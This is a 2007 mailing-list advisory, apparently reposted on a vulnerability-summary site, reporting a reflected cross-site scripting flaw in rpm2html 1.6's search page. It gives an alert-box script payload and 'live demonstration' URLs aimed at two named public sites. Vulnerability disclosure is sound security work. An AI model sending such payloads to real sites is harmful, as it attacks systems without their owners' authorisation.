Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

eSyndiCat  Input Validation Error  Vulnerability

RedLevel Advisory #015 - Redoable 1.2 Cross-Site Scripting Vulnerability (patch included)

From:	Vlad Ionescu <ym_vladiii_(at)_yahoo.com>
Date:	18.05.2007
Subject:	rpm2html 1.6 XSS Vulnerability

----------------------------------------------------------------------|
My Name: Vladiii                                                      |
My Country: Romania                                                   |
My Site: http://www.rstzone.net                                       |
My Team: I hope to enter in RST-Crew :)                               |
Contact me: ym_vladiii@yahoo.com                                      |
Special Shoutz: kw3rln (fluffy_bunny), flo_flow_supremacy, mozi2weed, |
               & all RST-crew & RSB-team Members.                    |
----------------------------------------------------------------------|
Vulnerable code: rpm2html 1.6                                         |
Download it from: http://public.www.planetmirror.com/pub/rpm2html/    |
----------------------------------------------------------------------|
XSS Vulnerability in search function :)
Details: we can change the query in URL with <script>alert('xss')</script>
        and will appear a Message Box with our code :)
Demonstration: http://vulerablesite.com/path/rpm2html[path]/search.
php?query=<script>alert('xss')</script>&blabla
Live demonstration: http://rpms.mandrivaclub.com/search.php?query=%3Cscript%3Ealert('
xss')%3C/script%3E&submit=Search+...
                   http://rpmfind.net/linux/rpm2html/search.php?query=%3Cscri
pt%3Ealert('xss')%3C/script%3E

POC !

vladiii 2007

---------------------------------
We won't tell. Get more on shows you hate to love
(and love to hate): Yahoo! TV's Guilty Pleasures list.

---------------------------------
Now that's room service! Choose from over 150,000 hotels
in 45,000 destinations on Yahoo! Travel to find your fit.